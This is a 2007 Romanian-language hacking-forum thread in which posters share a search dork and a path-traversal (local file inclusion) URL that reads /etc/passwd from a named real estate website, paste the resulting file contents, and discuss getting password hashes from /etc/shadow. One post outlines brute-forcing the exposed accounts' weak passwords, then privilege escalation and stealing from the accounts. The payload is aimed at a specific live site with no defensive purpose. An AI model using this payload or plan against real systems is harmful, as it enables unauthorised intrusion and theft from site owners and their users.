zbeng Posted September 5, 2007 Report Posted September 5, 2007 dork: Developed by : Irbosol Group - SGPS.bug: /index.php?body=../../../../../../../../etc/passwdhttp://www.algarveproperties.net//index.php?body=../../../../../../../../etc/passwdnu e gasit de mine Quote
hackedss Posted September 6, 2007 Report Posted September 6, 2007 asa man ... si cand dau pe alea si gasesc cam asa .. une exemplu unde il scriu /root:/bin/bash Quote
nullbyte Posted September 6, 2007 Report Posted September 6, 2007 zbeng, parolele sunt in shadow... Quote
Guest BanKai Posted September 6, 2007 Report Posted September 6, 2007 lol mai fetelor lfi are cu totul alta intrebuintzare nusa citesti passwd sau shadow asta e un exemplu pe care toata lumea il foloseste pentru ca /etc/passwd are orice unix . Quote
bossjuan Posted September 6, 2007 Report Posted September 6, 2007 daca imi apare asda cum facsa aflu parola mai departeroot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync Quote
nullbyte Posted September 6, 2007 Report Posted September 6, 2007 daca imi apare asda cum facsa aflu parola mai departeroot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/syncAM SCRIS CA PAROLELE SE AFLA IN /shadow si nu ai sanse. Mai citeste si jos, nu doar primul post :evil: :evil: Quote
x.o Posted September 6, 2007 Report Posted September 6, 2007 daca imi apare asda cum facsa aflu parola mai departeroot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/syncAM SCRIS CA PAROLELE SE AFLA IN /shadow si nu ai sanse. Mai citeste si jos, nu doar primul post :evil: :evil:+ tre drepturi de root pentru a putea afisa shadow Quote
moubik Posted September 6, 2007 Report Posted September 6, 2007 /etc/passwd e pt pustanii care afla ce conturi sunt acolo, fara sa afle practic parolele sau hashurile si pe urma fac ei faza cu programel care face bruteforce pe toate conturile si gasesc 1-2-3-4 conturi cu parole unsafe.dupa care poti sa incerci un privilege escalation sau exploit local, sau sa furi ceva din contu ala.uite o idee .... Quote